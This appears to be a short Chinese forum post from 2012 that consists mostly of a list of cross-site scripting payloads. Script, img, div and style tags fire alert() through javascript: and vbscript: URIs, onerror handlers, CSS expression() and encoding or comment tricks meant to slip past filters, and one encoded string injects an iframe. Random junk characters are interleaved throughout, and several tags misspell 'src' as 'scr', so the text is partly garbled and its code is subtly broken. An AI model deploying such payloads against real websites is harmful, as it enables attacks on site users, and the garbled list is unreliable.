<script>alert("跨站")</script> (最常用)/ e1 D! m2 k" \" ?8 m1 ]; \
<img scr=javascript:alert("跨站")></img>
9 d& `$ @. R2 f, F! j<img scr="javascript: alert(/跨站/)></img># q% @: z/ y; Q: k% O* {
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)8 G6 u! H1 {0 b
<img scr="#" onerror=alert(/跨站/)></img>
$ n8 Z$ h# M% ~8 F2 ]6 }4 ^3 h U<img scr="#" style="xss:expression(alert(/xss/));"></img>
+ Q% p6 R; l. M: W. p y) |8 ]<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释), O. x2 T; G. i7 m1 X, f/ Q
<img src=vbscript:msgbox ("xss")></img>
6 c3 V9 X- U4 d<style> input {left:expression (alert('xss'))}</style>+ w2 [* J% j8 H1 N% q
<div style={left:expression (alert('xss'))}></div>
: F, P" \8 E5 C; o% a( B<div style={left:exp/* */ression (alert('xss'))}></div>
, ?0 L: S& B9 d<div style={left:\0065\0078ression (alert('xss'))}></div>: h+ ]3 x; e9 J4 ~7 b' X H
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
/ l) o; r! {% N: Zunicode <div style="{left:expRessioN (alert('xss'))}">2 g3 Z$ t+ y, o: L, r
* \* W. C) l8 r/ S- L$ @$ c- V# J8 n
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
' r5 n: _$ Z4 _' U ~) P: L |
发表于 2012-9-13 17:15:04
收藏
支持
反对